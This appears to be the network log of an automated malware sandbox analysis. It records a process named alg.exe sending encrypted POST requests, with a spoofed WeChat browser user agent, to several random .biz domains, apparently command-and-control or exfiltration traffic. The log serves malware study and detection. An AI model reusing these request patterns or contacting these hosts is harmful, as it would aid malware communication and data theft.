                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.293462038 CET351OUTPOST /piudubsi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.293612003 CET834OUTData Raw: f8 9c 5a 8b 65 81 62 92 36 03 00 00 63 d2 ee 6b c9 22 05 dd 56 8c 46 19 00 18 4b 7f 64 ca a4 99 52 4b 6c 91 8f d3 e4 9a 4a b6 38 48 b3 af c1 2c 49 86 f3 b3 bd 38 12 9b ad d3 22 8a 71 73 2c b5 5b fb c1 9b e8 7b f6 b4 88 02 35 aa f5 21 b6 47 ca b1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Zeb6ck"VFKdRKlJ8H,I8"qs,[{5!G(XEu=sBuXtWBq9{kxd>`1{[2{cf!EdtSS"YtG(!XYhyO}wn]EW1Z-$aE|9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.439344883 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.548918962 CET353OUTPOST /twarfxyjhx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.548950911 CET834OUTData Raw: 29 32 d8 15 80 c7 8f cf 36 03 00 00 cc fb 50 55 94 fd aa c2 e3 37 6d 8a fb 9f 94 25 9f 13 3f 43 8d 86 f8 2d 03 a2 73 ad 82 e6 3f 84 8e ef e8 42 d5 91 c3 58 46 a5 a5 bf 30 f2 f9 24 1a a9 8a 08 5b d2 22 b5 49 77 d4 36 81 55 0c cd 51 da fb dc 24 78
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )26PU7m%?C-s?BXF0$["Iw6UQ$xdu}k-/s1M'ZLV!Q6'P}jfT%C\g;wi1!^^r'qjQkj)B8fc?pu^]; U^6u/
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.695333004 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.946777105 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.009902000 CET352OUTPOST /iwsqruc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.009916067 CET834OUTData Raw: e6 f1 2f 07 b6 37 7c 02 36 03 00 00 50 0c 42 e7 02 9b e4 60 59 31 bb e5 6d 00 9e 72 68 20 b1 1c 18 dd 64 3c c5 70 c7 f1 a7 2d aa b1 f3 cb b8 29 4a a7 2f bc f8 11 de 05 c4 64 3e 0a 59 51 82 a7 a1 ed 40 0f 21 6b 32 57 5a 29 16 20 dc 18 f1 95 c3 35
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /7|6PB`Y1mrh d<p-)J/d>YQ@!k2WZ) 5?&}ajV?e2Gl-WI5bgZ=[-9TdVE&mhECZ"H?S/u\P)B^(Og9Z>]HVz.
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.164326906 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.177228928 CET349OUTPOST /qdah HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.180711985 CET834OUTData Raw: 17 87 ad 91 d0 7c aa 3f 36 03 00 00 02 d8 d2 70 5b d3 ca 28 71 41 49 85 10 b0 da 59 b0 a2 4c 30 9c 98 62 5c 2b 85 be 04 d0 4c ec 59 91 98 6d fb a0 a3 44 88 20 64 28 ca ea ce 4f d6 3c 6b 2a cc f1 bc b1 cd 00 02 d9 9a de ba e0 f5 45 56 63 35 32 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: |?6p[(qAIYL0b\+LYmD d(O<k*EVc52.y?9@g &!A|CnuN~6,(M&?GH05`MirI+lJ&5|U\fmC+?Q`w.IoDL}p/dHI,29G1OHP&~BY
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.325150967 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        81192.168.2.105006013.251.16.150807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.275382042 CET351OUTPOST /ekicmdatg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.275382042 CET778OUTData Raw: 7e be f2 6b f4 ec f6 f0 fe 02 00 00 9b ea c3 52 09 3c 1d 69 f7 26 21 2b a1 c1 50 90 bd b5 36 c1 04 75 7a 67 b6 59 5c c8 ab ae eb fe fe 6b 32 8c a2 06 aa c6 ee 53 90 f1 30 61 ea 4f b2 03 a6 c4 5c 66 a5 5a 0f 42 30 cf ab 38 ad 9e bb d9 32 3b 71 05
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ~kR<i&!+P6uzgY\k2S0aO\fZB082;q;XP51Af'Q~{)a4l54@}`9,PJlloTkRpzZS*`{^NkZP;W~X{2"Pi%H-iQEIH
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:06.732729912 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7a320d3f97536e29360778a08eb1752b|155.94.241.187|1731920346|1731920346|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        82192.168.2.105006113.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:06.026982069 CET350OUTPOST /glmweuqq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:06.026982069 CET834OUTData Raw: 4b 98 b5 05 0e 35 6d 6e 36 03 00 00 80 cb a5 66 05 6c 8e 3b 00 74 bf 8f 7f f0 19 bb 19 99 9d fc a8 dc bf 4c 28 64 46 d9 4f d3 1a 3a a6 80 bd 2b 16 2f bc 03 32 9d ae 98 8a 4a 0b e1 16 2f 95 da 3b d9 69 36 e2 f0 8f de 9e 53 1e f1 1d 58 11 6d 60 d0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: K5mn6fl;tL(dFO:+/2J/;i6SXm`)Or5.{atPCJclW4Z"VxV_a8GvA*qRBYZPq<p7{_"o1{&C16\9Ts}Y!7{$>\'9K
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.476030111 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b0c1d29ba7a43e691c4764755ea97528|155.94.241.187|1731920347|1731920347|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        83192.168.2.105006234.246.200.160807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.011133909 CET347OUTPOST /nb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
